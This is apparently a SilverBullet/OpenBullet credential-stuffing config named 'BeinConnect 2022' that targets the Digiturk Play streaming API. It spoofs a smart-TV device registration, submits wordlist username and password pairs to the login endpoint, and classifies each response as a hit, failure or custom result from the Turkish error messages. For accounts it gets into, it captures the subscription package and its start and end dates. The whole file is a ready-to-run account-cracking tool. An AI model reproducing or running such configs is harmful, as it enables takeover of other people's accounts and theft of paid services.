[SETTINGS]
{
  "Name": "BeinConnect 2022",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-07-11T19:43:35.6633968+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Raymond",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "BeinConnect 2022",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION GenerateGUID -> VAR "GUID" 

REQUEST POST "https://service2-cloud.digiturkplay.com/api/v2/device/init/request" 
  CONTENT "{\"ClientVersion\":\"3.0.11\",\"DeviceName\":\"SMARTTV\",\"ConnectionType\":\"WIFI\",\"CpuAbi\":\"CpuAbi\",\"CpuAbi2\":\"CpuAbi2\",\"DeviceBrand\":\"\",\"DeviceFirmwareVersion\":\"\",\"DeviceHardware\":\"\",\"DeviceHardwareVersion\":\"\",\"DeviceId\":\"<GUID>\",\"DeviceLanguage\":\"\",\"DeviceManufacturer\":\"\",\"DeviceModel\":\"\",\"DeviceOsVersion\":\"\",\"DeviceType\":\"\",\"IsRoot\":0,\"OsArch\":\"CpuAbi\",\"ScreenSize\":\"\",\"GANumber\":\"\",\"serviceAccountId\":0,\"partyRoleId\":0}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: tr-TR,tr;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: service2-cloud.digiturkplay.com" 
  HEADER "Origin: https://smrtlg.digiturkplay.com" 
  HEADER "Referer: https://smrtlg.digiturkplay.com/" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 

REQUEST POST "https://service2-cloud.digiturkplay.com/api/v2/Users/Account/Login" 
  CONTENT "{\"Username\":\"<USER>\",\"Password\":\"<PASS>\",\"grant_type\":\"password\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 79" 
  HEADER "Content-Type: application/json" 
  HEADER "Cookie: init=<COOKIES(init)>" 
  HEADER "Host: service2-cloud.digiturkplay.com" 
  HEADER "Origin: https://smrtlg.digiturkplay.com" 
  HEADER "Referer: https://smrtlg.digiturkplay.com/" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "message\":\"Üyelik ya da Şifre bilgisi geçersiz! Lütfen bilgilerinizi kontrol ederek tekrar deneyiniz." 
    KEY "message\":\"Lütfen bilgilerinizi giriniz." 
    KEY "message\":\"Email adresiniz geçersiz." 
    KEY "status\":200,\"message\":\"\",\"trace_id\":\"" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Gönderilen onay kodu ile şifrenizi belirleyebilirsiniz" 
    KEY "message\":\"Şifrenizin geçerlilik süresi dolmuştur. Lütfen yeni şifre belirleyiniz" 
    KEY "message\":\"Bağlantı yaptığınız uygulama için uygun üyeliğiniz bulunamamıştır." 
    KEY "Daha sonra size gönderilen aktivasyon kodu ile şifrenizi belirleyiniz" 
    KEY "message\":\"Giriş yetkiniz bulunmamaktadır." 
  KEYCHAIN Success OR 
    KEY "access_token" 

PARSE "<SOURCE>" JSON "access_token" -> VAR "access_token" 

REQUEST GET "https://service2-cloud.digiturkplay.com/api/v2/user-products" 
  
  HEADER "Accept: text/plain, */*; q=0.01" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: tr-TR,tr;q=0.9" 
  HEADER "Authorization: bearer <access_token>" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Cookie: init=<COOKIES(init)>" 
  HEADER "Host: service2-cloud.digiturkplay.com" 
  HEADER "Origin: https://smrtlg.digiturkplay.com" 
  HEADER "Referer: https://smrtlg.digiturkplay.com/" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "user_products\":[],\"" 

PARSE "<SOURCE>" LR "- " "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Paketi" 

PARSE "<SOURCE>" LR "start_date\":\"" "T" CreateEmpty=FALSE -> CAP "Paket Başlangıç Tarihi" 

PARSE "<SOURCE>" LR "end_date\":\"" "T" Recursive=TRUE CreateEmpty=FALSE -> CAP "Paket Bitiş Tarihi" 

